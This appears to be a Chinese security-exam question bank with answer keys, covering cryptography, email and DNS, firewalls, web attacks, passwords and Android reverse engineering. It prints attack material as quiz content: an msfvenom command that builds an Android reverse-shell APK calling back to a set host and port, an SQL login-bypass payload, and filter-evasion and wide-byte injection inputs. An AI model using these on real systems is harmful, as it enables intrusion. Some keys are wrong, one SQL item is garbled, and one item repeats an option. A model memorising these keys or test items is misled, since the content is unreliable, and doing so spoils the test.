C、 堆成密码体制
D、 分组密码体制
您的答案: 标准答案: C
26、____表示邮件服务器返回代码为临时性失败(xx代表任意数)。
A、 2xx
B、 3xx
C、 4xx
D、 5xx
您的答案: 标准答案: C
27、买家称购买商品异常后的正确操作是立即咨询官方客服。
A、 正确
B、 错误
您的答案: 标准答案: A
28、网上陌生人给你发送补丁文件正确的操作是不下载文件。
A、 错误
B、 正确
您的答案: 标准答案: B
29、下列对于白帽、黑帽和灰帽黑客描述错误的是____。
A、 白帽黑客帮助企业进行安全测试
B、 黑帽黑客是自己对网站进行攻击
C、 灰帽黑客是不会恶意的使用漏洞进行攻击
D、 黑客所有的一切操作都是违法的
您的答案: 标准答案: D
30、白帽黑客正确的的行为是不可以传播、共享数据。
A、 错误
B、 正确
您的答案: 标准答案: B
31、用于电子邮件传输网络标准的协议是
A、 SMTP
B、 PPTP
C、 MLTP
您的答案: 标准答案: A
32、能支持非ASCII码字符文本格式的标准是
A、 SMTP
B、 MIME
C、 JSON
您的答案: 标准答案: B
33、1995年推出了新ESMTP的RFC号是
A、 RFC5321
B、 RFC1869
C、 RFC821
您的答案: 标准答案: B
34、SMTP只支持7位ASCII码,且不能传输二进制文件
A、 对
B、 错
您的答案: 标准答案: A
35、第一次是谁提出现代密码学编码原则的
A、 1884年Kerchoffs提出加密规则
B、 1883年Kerchoffs提出编码原则
C、 1884年Kerchoffs提出编码算法
D、 1883年Kerchoffs提出规则加密
您的答案: 标准答案: B
36、目前流行的加密算法有DES,AES,RSA,MD5,SHA1?
A、 对
B、 错
您的答案: 标准答案: A
37、常见非对称式算法有?
A、 DES,3DES,ASE
B、 ASE,RSA,ECC,MD5,SHA,DSA
C、 DES,AES,RSA,MD5,SHA1
D、 RSA,DSA,ECC
您的答案: 标准答案: D
38、DES的加密长度是多少位?
A、 128位
B、 112或者128位
C、 128、192、256位
D、 56位
您的答案: 标准答案: D
39、物理生活中密码泄露通常是什方式泄露
A、 网络上面使用弱口令被通过碰撞方式泄露
B、 公共场合免费WIFI等
C、 钓鱼网站
D、 以上全对
您的答案: 标准答案: B
40、使用什么协议浏览网页更加安全
A、 ftp
B、 http
C、 https
D、 tcp/ip
您的答案: 标准答案: C
41、使用最正确的方式防范个人信息安全的是?
A、 在网络中使用多个复杂密码提高自身密码安全性防止服务商泄露
B、 在网络中使用多个复杂密码提高自身密码安全性
C、 使用notepad记录常用密码放到电脑
D、 使用复杂密码定期修改,选择可靠平台,不主动透露个人信息
您的答案: 标准答案: D
42、及时发现项目BUG进行日志监控,哪些操作最合理正确?
A、 查看服务器配置的WEB日志进行监控
B、 使用安全防护软件进行日志扫描
C、 能在用户发生错误的那一刻,通过日志发现那些黑客在攻击我们
D、 使用常见的日志检查工具,配合debug模式进行测试查看是否控制严格
您的答案: 标准答案: D
43、如何做好日常防护防范
A、 不信任客户端提交过来的任何数据
B、 不接受客户端提交过来的任何数据
C、 客户端提交过来的数据严格检查,做好规则
D、 不理客户端提交过来的数据该怎么提交就怎么提交
您的答案: 标准答案: C
44、网络中使用防火墙起到什么作用?
A、 防止电脑报错
B、 防止流量异常
C、 防止黑客
D、 保护内部敏感信息资源,防止内部泄露
您的答案: 标准答案: D
45、网络传输五元组以下那个正确?
A、 目的端口,源端口,应用层,传输层,物理层
B、 原Mac,目的MAC,数据链路层,网络层,会话层
C、 目的IP,原IP,协议号,目的端口,原端口,会话层
D、 目的IP,原IP,协议号,目的端口,原端口
您的答案: 标准答案: D
46、防火墙访问控制列表"允许任何流量通过"规则
A、 access-list 1 deny 172.16.4.13 0.0.0.0
B、 access-list 2 permit 172.16.0.0 0.0.255.255
C、 access-list 3 permit 0.0.0.0 255.255.255.255
D、 access-list 3 permit 0.0.0.0 255.0.0.255
您的答案: 标准答案: C
47、透明模式和桥模式说法正确的有?
A、 内外网在一个网段内
B、 有点是直接串联到链路上,不改变原有的网络IP地址
C、 缺点是像玻璃一样,屋内屋外一览无余
D、 以上全对
您的答案: 标准答案: D
48、虚拟化主机安全?
A、 云存储安全,云存储杀毒,访问控制,源数据备份
B、 vVirus,vFw,vSwitch,vIDS,运维审计,安全加固
C、 云安全管理平台,SDN+VxLan,安全域划分,网络边界防护,运维审计
D、 温、温度,接地,防静电,消防
您的答案: 标准答案: B
49、什么技术可以伪造任意电话号码?
A、 钓鱼电话
B、 冒充电话
C、 伪基站技术
D、 网络电话
您的答案: 标准答案: C
50、劫持到其他网页和游戏广告是从那个入口被劫持的
A、 链接网络
B、 网络接口
C、 路由器
D、 电脑
您的答案: 标准答案: C
1、路由器有哪几种加密方式
A、 WEP,WEPA-PSD,WPA2-PSK,WPA-PSK+WPA2-PSK
B、 WEP,WEPA-PSA,WPA2-PSK,WPA-PSK
C、 WEP,WEPA-PSS,WPA2-PSK,WPA-PSK+WPA2-PSK
D、 WEP,WEPA-PSK,WPA2-PSK,WPA-PSK+WPA2-PSK
您的答案: 标准答案: D
2、黑客劫持DNS会出现那些状况
A、 网络浏览网页变快
B、 网络浏览网页速度明显变慢
C、 网络加速
D、 网络浏览网页更加安全
您的答案: 标准答案: B
3、网购诈骗流程操作?
A、 交易失败-虚假客户-误导提示-钓鱼链接-网银授权操作
B、 交易失败-虚假客户-误导提示-网银授权操作-洗劫卖家网银账号
C、 交易失败-误导提示-钓鱼链接-网银授权操作-洗劫卖家网银账号
D、 交易失败-虚假客户-误导提示-钓鱼链接-网银授权操作-洗劫卖家网银账号
您的答案: 标准答案: D
4、邮件收发环境包括()来完全组合:
A、 防火墙,DMZ隔离区,网络中间节点
B、 邮件服务器,邮件客户端
C、 数据库,Appliance,云端
D、 防火墙,DMZ隔离区,Appliance,网络中间节点,邮件服务器,邮件客户端,数据库,云端
您的答案: 标准答案: D
5、邮件投递过程中顺序正确的是():
A、 MUA编辑邮件,MSA编辑完发送,MTA邮件传输,MDA邮件投递
B、 MSA编辑完发送,MDA邮件投递
C、 邮件用户代理,邮件递交代理,邮件投递代理,邮件传输代理
D、 编辑邮件,MTA邮件传输,邮件递交代理,邮件投递代理
您的答案: 标准答案: A
6、利用 DNS查找目的地址,记录说明错误的是():
A、 A记录:主机到IP地址的映射
B、 CNAME记录:查找主机别名
C、 MX记录:Domain到MTA的映射
D、 CNAME记录:查找IP别名
您的答案: 标准答案: D
7、DNS记录类型说明错误的是():
A、 CNAME:别名到域名的映射
B、 PTR:正向DNS解析
C、 MX:实现主机名到接收邮件的主机名映射
D、 SPE:Mail Client简单的认证方式
您的答案: 标准答案: B
8、使用nslookup命令查询网址的MX记录,preference数字越小代表优先级低,越大优先级越高。()
A、 对
B、 错
您的答案: 标准答案: B
9、论文《计算机安全威胁监控与监视》提出的监视入侵活动的思路是
A、 利用日志作为审计数据监视入侵活动
B、 利用流量作为审计数据监视入侵活动
C、 利用恶意代码作为审计数据监视入侵活动
您的答案: 标准答案: A
10、IDS设备部署的关键是
A、 关键是查杀恶意代码
B、 关键是设备的正确配置
C、 关键是阻断攻击流量
D、 关键是日常安全事件的跟踪与处理
您的答案: 标准答案: D
11、入侵检测系统可以检测存在的恶意代码
A、 对
B、 错
您的答案: 标准答案: B
12、沙箱是通过哪种方式检测入侵
A、 逆向分析
B、 虚假目标
C、 行为表现
D、 流量检测
您的答案: 标准答案: C
13、把IDS串联在保护目标前就成了IPS
A、 对
B、 错
您的答案: 标准答案: B
14、攻击者利用中间人技术监听网络数据流量是破坏了信息安全三要素的哪一点?()
A、 保密性
B、 完整性
C、 可用性
D、 抗抵赖性
您的答案: 标准答案: A
15、Web服务器遭到ddos攻击,Web服务中断是破坏了信息安全三要素的哪一点?()
A、 保密性
B、 完整性
C、 可用性
D、 抗抵赖性
您的答案: 标准答案: C
16、安全保障需求的原因是价值风险。
A、 对
B、 错
您的答案: 标准答案: A
17、我国信息安全的标准是等级保护。
A、 对
B、 错
您的答案: 标准答案: A
18、密钥的传递方法有哪些?
A、 物理传递
B、 旧密钥加密新密钥
C、 加密链路
D、 对称加密
您的答案: 标准答案: D
19、UNIX文件的访问控制不包含下面哪一项?
A、 属主
B、 组成员
C、 root
D、 其他
您的答案: 标准答案: C
20、DoD(美国国防部)使用的四层分级制和权限空间不包含哪一项?
A、 绝密级
B、 隐私级
C、 秘密级
D、 机密级
您的答案: 标准答案: B
21、BLP模型中的“不上读,不下写”保证了数据的什么特性?
A、 安全性
B、 可用性
C、 完整性
D、 保密性
您的答案: 标准答案: D
22、TCP数据包报文中哪个字段不可以被利用来构成隐蔽通道?
A、 序号
B、 确认号
C、 保留字段
D、 数据迁移值
您的答案: 标准答案: D
23、下面那个保存密码的方式是最推荐的?
A、 脑记
B、 便签贴
C、 密码工具
D、 云笔记
您的答案: 标准答案: C
24、Google的GOTP采用哪一种方式做计数器?
A、 时间
B、 账号
C、 IP
D、 GPS
您的答案: 标准答案: A
25、HTTPS比HTTP安全,并且不会被截取到数据
A、 对
B、 错
您的答案: 标准答案: B
26、下列对称算法,哪个相对更安全?
A、 DES
B、 AES
C、 3DES
您的答案: 标准答案: B
27、1883年Kerchoffs 提出了编码的原则,是现代密码学与古密码的分界线
A、 对
B、 错
您的答案: 标准答案: A
28、下面关于OpenSSL心脏出血漏洞说法错误的是?
A、 OpenSSL默认端口443
B、 每次能获取到64Kb大小的信息
C、 没有任何危害
您的答案: 标准答案: C
29、网络全就是web安全。
A、 对
B、 错
您的答案: 标准答案: B
30、Des加密算法属于对称加密算法。
A、 对
B、 错
您的答案: 标准答案: A
31、下面不属于对称加密算法的是?
A、 DES
B、 AES
C、 hash
您的答案: 标准答案: C
32、数字签名能够伪造。
A、 对
B、 错
您的答案: 标准答案: B
33、Telnet协议是TCP/IP协议族中的一员,是Internet远程登陆服务的标准协议和主要方式。传输过程中是明文传输的。
A、 对
B、 错
您的答案: 标准答案: A
34、Cookie可进行简单的web用户状态认证。
A、 对
B、 错
您的答案: 标准答案: A
35、ORA可以协助证书作废过程。
A、 对
B、 错
您的答案: 标准答案: A
36、密码学的目的是?
A、 研究数据加密
B、 研究数据解密
C、 研究信息安全
D、 研究数据保密
您的答案: 标准答案: C
37、一个完整的密码体制,不包括以下( )要素。
A、 明文空间
B、 密文空间
C、 数字签名
D、 密钥空间
您的答案: 标准答案: C
38、以下关于等级保护的说法中不正确的是( )。
A、 是国家信息安全保障工作的基本制度、基本国策
B、 是开展信息安全工作的基本方法
C、 是提高国家综合竞争力的主要手段
D、 是促进信息化、维护国家信息安全的根本保障
您的答案: 标准答案: C
39、以下关于等级保护的说法中不正确的是:( )
A、 信息安全等级保护是对信息和信息载体按照重要性等级分级别进行保护的一种工作
B、 在中国、美国等很多国家都存在的一种信息安全领域的工作
C、 广义上为涉及到该工作的标准、产品、系统、信息等均依据等级保护思想的安全工作
D、 信息系统的等级保护工作不具有分级别保护的区别,可以统一进行防护
您的答案: 标准答案: D
40、以下关于等级保护工作说法不正确的是:( )
A、 信息安全等级保护工作主要是由使用方来进行,无需其他厂商、主管部门的参与
B、 等级保护是涉及技术与管理两个领域的复杂系统工程
C、 对于不同的信息系统划分不同的安全等级,提出逐级增强的安全指标基本要求
D、 信息安全等级保护建设的主要内容,就是要从“机密性、完整性以及可用性”的角度,客观评价保护对象(信息系统)的重要性
您的答案: 标准答案: A
41、访问网址www.1cbc.com.cn,将可能遭受( )攻击?
A、 缓冲区溢出攻击
B、 钓鱼攻击
C、 SQL注入攻击
D、 拒绝服务攻击
您的答案: 标准答案: B
42、钓鱼攻击具有下列选项中除了( )以外的所有特点。
A、 欺骗性Web链接
B、 真实的发送方地址
C、 一般性的问候
D、 要求采取行动的紧急请求
您的答案: 标准答案: B
43、下列对XSS攻击(跨站脚本攻击)描述正确的是( )
A、 XSS攻击指的是恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意攻击用户的特殊目的。
B、 XSS攻击是DDOS攻击的一种变种。
C、 XSS攻击就是CC攻击。
D、 XSS攻击就是利用被控制的机器不断地向被攻击网站发送访问请求,迫使IIS 连接数超出限制,当CPU 资源或者带宽资源耗尽,那么网站也就被攻击垮了,从而达到攻击目的。
您的答案: 标准答案: A
44、黑客利用IP地址进行攻击的方法有( )。
A、 欺骗
B、 解密
C、 窃取口令
D、 发送病毒
您的答案: 标准答案: A
45、下列对XSS攻击(跨站脚本攻击)描述正确的是( )。
A、 XSS攻击指的是恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中的html代码会被执行,从而达到恶意攻击用户的特殊目的
B、 XSS攻击是DDOS攻击的一种变种
C、 XSS攻击就是CC攻击
D、 XSS攻击就是利用被控制的机器不断地向被攻击网站发送访问请求,迫使IIS 连接数超出限制,当CPU 资源或者带宽资源耗尽,那么网站也就被攻击垮了,从而达到攻击目的
您的答案: 标准答案: A
46、下列网络攻击者称谓中,( )的技术含量通常最低。
A、 黑客
B、 脚本小子
C、 间谍
D、 网络恐怖分子
您的答案: 标准答案: B
47、秘密地将自己添加到文档或程序等宿主上,当文档被打开或程序被执行时执行的程序,称作( )。
A、 病毒
B、 蠕虫
C、 Rootkit
D、 木马
您的答案: 标准答案: A
48、病毒可以通过下列选项中除( )以外的方式从一台计算机传播到另一台计算机。
A、 作为电子邮件的被感染文件
B、 优盘上的被感染文件
C、 从互联网上下载的被感染文件
D、 重启计算机
您的答案: 标准答案: D
49、计算机病毒有很多种类型,但不包括( )。
A、 文件感染类病毒
B、 远程病毒
C、 内存驻留病毒
D、 引导区病毒
您的答案: 标准答案: B
50、 黑客要想控制某些用户,需要把木马程序安装到用户的机器中,实际上安装的是( )。
A、 木马的控制端程序
B、 木马的服务端程序
C、 不用安装
D、 控制端、服务端程序都必需安装
您的答案: 标准答案: B
1、下列哪项不是信息安全的定义?
A、 数据安全,确保数据不会被非法入侵者读取或破坏
B、 程序安全,重视软件开发过程的品质及维护
C、 系统安全,维护计算机系统正常操作
D、 环境安全,管理员不能用弱口令
您的答案: 标准答案: D
2、下列哪项不是正确的防止被骗操作?
A、 在淘宝购买东西应该使用旺旺交流
B、 商家发送的发票文件,直接打开
C、 商品多次修改价格,应该提高警惕
D、 对商家发送的文件进行查杀
您的答案: 标准答案: B
3、下列选项中对DES加密算法描述不正确的是?
A、 以64位为分组对数据进行加密
B、 其密钥长度为56位
C、 运用相同算法进行加密解密
D、 DES加密算法为最安全的加密算法之一
您的答案: 标准答案: D
4、下列关于标准防火墙的描述错误的是?
A、 防火墙安全规则遵循从上到下匹配原则,一旦有一条匹配,剩余的规则就不匹配了
B、 所有的规则都没有匹配到,数据包将丢弃
C、 安全过滤规则主要包含源、目的地址和端口
D、 防火墙的主要功能是防止病毒等恶意程序的传输
您的答案: 标准答案: D
5、对于“access-list 101 primit tcp any host 198.78.46.8 eq www”的acl规则理解正确的是?
A、 匹配顺序为101,允许ip为198.78.46.8的主机访问任何外部ip
B、 规则强度为101,不允许TCP连接,禁止所有主机对198.78.46.8的www服务进行访问
C、 匹配顺序为101,允许TCP连接,所有主机对198.78.46.8的www服务进行访问
D、 匹配顺序为101,允许TCP连接,禁止禁止所有主机对198.78.46.8的www服务进行访问
您的答案: 标准答案: C
6、下列那些SMTP命令是用来发送邮件的Envelop的?
A、 HELO xxx.com
B、 MAIL FROM :<>和RCPT TO:<>
C、 DATA
D、 AUTH LOGIN
您的答案: 标准答案: B
7、下列关于信息安全保障的描述错误的是?
A、 信息安全保障的是核心业务,信息安全保障是为了支撑业务的正常运行
B、 信息系统安全的保障是在整个信息系统的生命周期中
C、 要确保信息系统的保密性、完整性、和可用性
D、 信息安全保障策略的制定没办法考虑到地震、海啸等大自然的不可抗力
您的答案: 标准答案: D
8、下列对于下一代防火墙的描述错误的是?
A、 将访问控制对象从网络层、传输层延伸到应用层
B、 下一代防火墙能够识别应用和内容
C、 下一代防火墙可以限制用户是否能在上班时间访问娱乐社交软件
D、 下一代防火墙已经丢弃了传统防火墙的工作模式
您的答案: 标准答案: D
9、下列关于KDC的描述错误的是?
A、 KDC是秘钥分发中心
B、 网络中所有客户机和服务器都信任KDC,并使用KDC验证用户身份
C、 KDC是由认证服务和票据授予服务组成
D、 认证服务的作用主要是生成两个主题之间通信的票据
您的答案: 标准答案: D
10、下列哪项不是防火墙常见的工作方式?
A、 包过滤
B、 状态监测
C、 透明接入
D、 应用代理
您的答案: 标准答案: C
1、下列哪项不是信息安全的定义?
A、 数据安全,确保数据不会被非法入侵者读取或破坏
B、 程序安全,重视软件开发过程的品质及维护
C、 系统安全,维护计算机系统正常操作
D、 环境安全,管理员不能用弱口令
标准答案: D
2、下列哪项不是正确的防止被骗操作?
A、 在淘宝购买东西应该使用旺旺交流
B、 商家发送的发票文件,直接打开
C、 商品多次修改价格,应该提高警惕
D、 对商家发送的文件进行查杀
标准答案: B
3、下列选项中对DES加密算法描述不正确的是?
A、 以64位为分组对数据进行加密
B、 其密钥长度为56位
C、 运用相同算法进行加密解密
D、 DES加密算法为最安全的加密算法之一
标准答案: D
4、下列关于标准防火墙的描述错误的是?
A、 防火墙安全规则遵循从上到下匹配原则,一旦有一条匹配,剩余的规则就不匹配了
B、 所有的规则都没有匹配到,数据包将丢弃
C、 安全过滤规则主要包含源、目的地址和端口
D、 防火墙的主要功能是防止病毒等恶意程序的传输
标准答案: D
5、对于“access-list 101 primit tcp any host 198.78.46.8 eq www”的acl规则理解正确的是?
A、 匹配顺序为101,允许ip为198.78.46.8的主机访问任何外部ip
B、 规则强度为101,不允许TCP连接,禁止所有主机对198.78.46.8的www服务进行访问
C、 匹配顺序为101,允许TCP连接,所有主机对198.78.46.8的www服务进行访问
D、 匹配顺序为101,允许TCP连接,禁止禁止所有主机对198.78.46.8的www服务进行访问
标准答案: C
6、下列那些SMTP命令是用来发送邮件的Envelop的?
A、 HELO xxx.com
B、 MAIL FROM :<>和RCPT TO:<>
C、 DATA
D、 AUTH LOGIN
标准答案: B
7、下列关于信息安全保障的描述错误的是?
A、 信息安全保障的是核心业务,信息安全保障是为了支撑业务的正常运行
B、 信息系统安全的保障是在整个信息系统的生命周期中
C、 要确保信息系统的保密性、完整性、和可用性
D、 信息安全保障策略的制定没办法考虑到地震、海啸等大自然的不可抗力
标准答案: D
8、下列对于下一代防火墙的描述错误的是?
A、 将访问控制对象从网络层、传输层延伸到应用层
B、 下一代防火墙能够识别应用和内容
C、 下一代防火墙可以限制用户是否能在上班时间访问娱乐社交软件
D、 下一代防火墙已经丢弃了传统防火墙的工作模式
标准答案: D
9、下列关于KDC的描述错误的是?
A、 KDC是秘钥分发中心
B、 网络中所有客户机和服务器都信任KDC,并使用KDC验证用户身份
C、 KDC是由认证服务和票据授予服务组成
D、 认证服务的作用主要是生成两个主题之间通信的票据
标准答案: D
10、下列哪项不是防火墙常见的工作方式?
A、 包过滤
B、 状态监测
C、 透明接入
D、 应用代理
标准答案: C
1、以下选项中对"multipart/form-data"的解释不正确的是?()
A、 基础方法是post请求
B、 基础方法是get请求
C、 http协议本身的原始方法不支持multipart/form-data
D、 可用于文件上传时,设置表单的MIME类型
标准答案: B
2、以下哪个选项的内容可以替代SQL语句中的空格?()
A、 /**/
B、 #
C、 –
D、 //
标准答案: A
3、PHP的addslashes函数的作用是什么?()
A、 去除字符串中的预定义字符
B、 将字符串中的预定义字符之前添加反斜杠
C、 将字符串按照预定义字符进行分割
D、 将字符串中的预定义字符替换为空格
标准答案: B
4、mysql数据库使用utf-8字符集可能导致宽字节注入。
A、 对
B、 错
标准答案: B
5、%df’在以下哪种情况下能闭合单引号,形成宽字节注入?()
A、 使用PHP的trim函数,字符集使用utf-8
B、 使用PHP的trim函数,字符集使用gbk
C、 使用PHP的addslashes函数,字符集使用utf-8
D、 使用PHP的addslashes函数,字符集使用gbk
标准答案: D
6、以下哪种方式可以防止宽字节注入?()
A、 mysql_query(“set names gbk”)和addslashes()函数结合使用
B、 使用mysql_query(“set names gbk”)设置字符集
C、 mysql_set_charset(“gbk”)和mysql_real_escape_string()函数结合使用
D、 使用mysql_set_charset(“gbk”)设置字符集
标准答案: C
7、以下哪个选项对asp运算符的解释错误?()
A、 <>为不等于
B、 IS判断两个字符串是否相等
C、 XOR为"异或"运算
D、 OR为"或"运算
标准答案: B
8、SQL语句"select * from user where name=’". n a m e . " ′ a n d p a s s = ′ " . name."' and pass='". name."′andpass=′".pass."’"如何绕过登录?()
A、 $name设置值为admin’ and ‘1’=‘1’ $pass的值为123456
B、 $name设置值为admin’ and ‘1’='1 $pass的值为123456
C、 $name设置值为admin’ or ‘1’='1 $pass的值为123456
D、 $name设置值为admin’ or ‘1’=‘1’ $pass的值为123456
标准答案: C
9、以下选项中哪些措施不能防御CSRF攻击?()
A、 使用一次性Token验证
B、 在HTTP头中自定义属性并验证
C、 全部操作使用POST传递数值
D、 使用复杂度高的验证码
标准答案: C
10、以下哪个函数是作为FLASH与宿主界面JavaScript通信的接口?()
A、 External.call
B、 ExternalConfig.call
C、 ExternalInterface.call
D、 Externalrunning.call
标准答案: C
11、以下哪个选项的内容是JavaScript中的注释符?()
A、 ~
B、 //
C、 *
D、 #!
标准答案: B
12、以下哪个选项对于反射型XSS的描述是错误的?()
A、 可以结合CSRF来利用
B、 攻击代码存储在客户端
C、 攻击代码存储在服务端
D、 可以劫持用户访问链接
标准答案: C
13、以下哪个选项可以成功的设置Web应用浏览器端的Cookie值?()
A、 在浏览器Console中输入document.cookie=“test=123456”
B、 在浏览器Console中输入document.cookie(“test=123456”)
C、 在浏览器地址栏中输入document.cookie=“test=123456”
D、 在浏览器地址栏中输入document.cookie(“test=123456”)
标准答案: A
14、技术流的完整提供测试不包含下面那一项?
A、 勘察探索
B、 监测捕获
C、 错误定位
D、 错误修复
标准答案: D
15、以下哪个选项不属于安全测试的流程?
A、 信息汇总
B、 交互测试
C、 审核验证
D、 项目交接
标准答案: D
16、软件开发安全生产解决方法不包含哪一项?
A、 溯源检测
B、 合规检测
C、 安全检测
D、 应急响应
标准答案: D
17、安全检测需要嵌入到软件开发流程中。
A、 对
B、 错
标准答案: A
18、HTTPS的设计是可以避免下列哪种攻击?
A、 SQL注入攻击
B、 跨站脚本攻击
C、 中间人攻击
D、 暴力破解攻击
标准答案: C
19、同源策略不包含下面那一项?
A、 协议
B、 路径
C、 端口号
D、 域名
标准答案: A
20、哪些设置可以有效的避免cookie的完整性所带来的安全问题?
A、 Shared domain providers
B、 Website development/deployment
C、 Exploration of Cookie Policy Change
D、 HTTPS instead of HTTP
标准答案: D
21、App-web接口检测系统架构的组成包含哪些?
A、 Triggering
B、 Detection
C、 Provenance
D、 Counterattack
标准答案: D
22、App-web接口检测系统使用哪种方法识别APP上的广告?
A、 特征码
B、 接口扫描
C、 机器学习
D、 分类标识
标准答案: A
23、下面哪一项不属于浏览器的防护手段?
A、 沙盒
B、 隔离堆
C、 Httponly
D、 栈cookies
标准答案: C
24、Redis未授权漏洞的根本原因是运维人员安全意识薄弱
A、 对
B、 错
标准答案: A
25、如果服务端IP为192.168.1.1,下列哪项是使用命令手动连接Redis的正确方式?
A、 redis-cli 192.168.1.1
B、 Redis -cli 192.168.1.1
C、 redis cli 192.168.1.1
标准答案: A
26、Centos6.5下,在当前目录下,搜索文件内容包含‘aa’文字的内容的命令是 find / | xargs grep “aa” ?
A、 对
B、 错
标准答案: B
27、$_GET可以用于接收表单的值。
A、 对
B、 错
标准答案: A
28、下面哪个不是CMS?
A、 WordPress
B、 织梦
C、 帝国CMS
D、 MVC
标准答案: D
29、SQL注入又可以称为“PHP注入”,“JSP注入”。
A、 对
B、 错
标准答案: B
30、假如MySQL数据库注入点存在,“select//user()//from/**/dual”该语句是否可以成功注入绕过空格过滤。
A、 对
B、 错
标准答案: A
31、SQLmap可以进行表单注入。
A、 对
B、 错
标准答案: A
32、为了防止恶意用户爆破web登录,为们只需在登录界面加上验证码提示。
A、 对
B、 错
标准答案: B
33、后台登录验证都是先验证验证码是否正确,再验证用户名密码是否正确
A、 对
B、 错
标准答案: B
34、在验证过程中,根据返回值在本地验证,该种验证方法可绕过
A、 对
B、 错
标准答案: A
35、只要用户的密码足够复杂,就不存在信息泄露的风险。
A、 对
B、 错
标准答案: B
36、Hydra 可以爆破Windows远程登录的账号和密码
A、 对
B、 错
标准答案: A
37、下面哪项密码设置方式会造成被弱口令攻击的风险?
A、 增大密码的复杂度
B、 使用初始化账号密码
C、 经常更改密码
标准答案: B
38、下面哪个密码更合乎密码安全性规则?
A、 qazwsx123
B、 helloworld
C、 789567123
D、 AECerg.21$khlle
标准答案: D
39、只要密码足够复杂,就不会存在密码泄露。
A、 对
B、 错
标准答案: B
40、WebLogic 默认的端口号是?
A、 3306
B、 9001
C、 7359
D、 7001
标准答案: D
41、下面不是防止WebLogic弱口令的是?
A、 修改默认端口
B、 修改默认账号密码
C、 使用默认配置路径
标准答案: C
42、WebLogic是一个基于JAVAEE架构的中间件,用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。
A、 对
B、 错
标准答案: A
43、为了密码安全起见,密码的更换周期一般为多久?
A、 30天
B、 60天
C、 90天
D、 一年
标准答案: C
44、不同注册使用相同的密码。
A、 对
B、 错
标准答案: B
45、下面哪个不属于使用密码的好习惯?
A、 将账号密码记录在网络上
B、 经常修改密码
C、 使用密码位数大于15位且复杂度高
标准答案: A
46、靠欺骗别人来获得安全敏感信息的方式被称作( )。
A、 社会工程学
B、 魔法攻击
C、 暴力破解攻击
D、 诡计攻击
标准答案: A
47、撞库得手的原因是( )。
A、 用户扫描不安全的二维码
B、 用户为图省事,在许多网站设置相同的用户名和口令
C、 用户电脑被植入木马
D、 用户连接不安全的无线网络导致
标准答案: B
48、在下述产生安全口令的方法中,相比而言最安全的一项是( )。
A、 将用户名的名字,姓或名的第一个字母以及该用户的相关信息作为口令
B、 用地名、山名、著名人物、小说题目、常用英文单词作为口令
C、 组合用户的名字,形成一个字符串,将该串进行二进制表示
D、 将一个长句子使用某种安全哈希函数进行压缩,作为口令
标准答案: D
49、最低效的口令攻击类型是______。
A、 暴力破解攻击
B、 字典攻击
C、 彩虹表攻击
D、 机器攻击
标准答案: A
50、在下述产生安全口令的方法中,相比而言最安全的一项是()
A、 将用户名的名字,姓或名的第一个字母以及该用户的相关信息作为口令。
B、 用地名、山名、著名人物、小说题目、常用英文单词作为口令。
C、 组合用户的名字,形成一个字符串,将该串进行二进制表示。
D、 将一个长句子使用某种安全哈希函数进行压缩,作为口令。
标准答案: D
1、使用adb调试工具如何卸载安卓程序?
A、 使用adb install命令加APK文件的路径来卸载安卓程序
B、 使用adb uninstall命令加APK文件的路径来卸载安卓程序
C、 使用adb delete命令加APK的包名卸载安卓程序,包名可通过逆向获得
D、 使用adb uninstall命令加APK的包名卸载安卓程序,包名可通过逆向获得
标准答案: D
2、下列关于smali的描述错误的是?
A、 smali是安卓系统中JAVA虚拟机(Dalvik)使用的一种.dex文件的汇编器
B、 安卓系统中代码最终编译不是采用java的class,而是使用smali
C、 smali是一种安卓开发语言
D、 smali有着自己独特的语法特点
标准答案: C
3、通常情况下,下列哪个目录不是APK安装后释放文件的目录?
A、 /data/app/
B、 /data/data/
C、 /sdcard/android
D、 /system/bin
标准答案: D
4、下列关于安卓系统目录的描述错误的是?
A、 /system/bin ,存放系统本地程序,主要是linux自带的组件
B、 /system/framework ,存放系统平台框架文件
C、 /system/app ,存放常规下载的应用程序
D、 /system/lib ,存放系统的配置文件,比如APN介入点设置等核心配置
标准答案: D
5、下列对于Dalvik字节码的描述错误的是?
A、 package/name/ObjectName相当于java中的package.name.ObjectName
B、 [[1相当于java中的int[][]
C、 .registers指定了方法中占用内存空间大小
D、 .local 指令表名了方法中寄存器的总数
标准答案: D
6、下列哪项不是APK中class文件的保护的方法?
A、 名称替换
B、 字符串加密
C、 增加变量
D、 反射替换
标准答案: C
7、下列哪项不是APK保护中native的功能?
A、 完整性校验
B、 漏洞检测
C、 单步检测
D、 断点检测
标准答案: B
8、下列哪项不是预防手机中xcodeghost病毒的措施?
A、 修改icloud密码
B、 下载盘古工具进行自检
C、 卸载或更新已感染文件
D、 手机进行越狱
标准答案: D
9、下面对于"msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=4444 -o ichunqiu.apk"的解读错误的是?
A、 生成一个叫ichunqiu.apk的恶意文件
B、 文件安装后执行会与IP为192.168.1.2的主机进行通信
C、 设置与主机通信的端口为4444
D、 通信时手机会打开4444端口
标准答案: D
10、Metasploit设置的LHOST是本机实际地址而不是外网地址。
A、 正确
B、 不正确
标准答案: A
11、数据运算之减法运算指令"sub-float vx,vy,vz"表示什么含义?
A、 计算vy-vz并将结果存入vx
B、 计算vx-vz并将结果存入vy
C、 计算vx-vy并将结果存入vz
D、 计算vy-vx并将结果存入vz
标准答案: A
12、移位指令之右移指令"shr-int vx,vy,vz" 表示什么含义?
A、 右移vy,vy+1,vz指定移动的位置,结果存入vx,vx+1
B、 无符号右移vy,vz指定移动的位置,结果存入vx
C、 右移vy,vz指定移动的位置,结果存入vx
D、 无符号右移vy,vy+1,vz指定移动的位置,结果存入vx,vx+1
标准答案: C
13、流程控制之if指令:"if-eq vA,vB,:cond_**"的含义是什么?
A、 如果vA等于vB则跳转到:cond_**
B、 如果vA小于vB则跳转到:cond_**
C、 如果vA大于vB则跳转到:cond_**
D、 如果vA等于vB则跳转到:cond_**
标准答案: D
14、(Android系统中,)java代码反编译之后那种字节码方便于读取
A、 Java字节码
B、 jvm字节码
C、 Dalvik字节码
D、 .class字节码
标准答案: C
15、反编译smali文件里面(.registers)函数表达的意思是?
A、 类
B、 数组
C、 寄存器
D、 参数为空
标准答案: C
16、代码中(new-instance v1,Ljava/lang/stringBuilder;)操作指令的表达的是?
A、 new一个v1
B、 new一个ljava
C、 new一个lang/stringBuilder放到v1
D、 new一个stringBuilder放到v1
标准答案: D
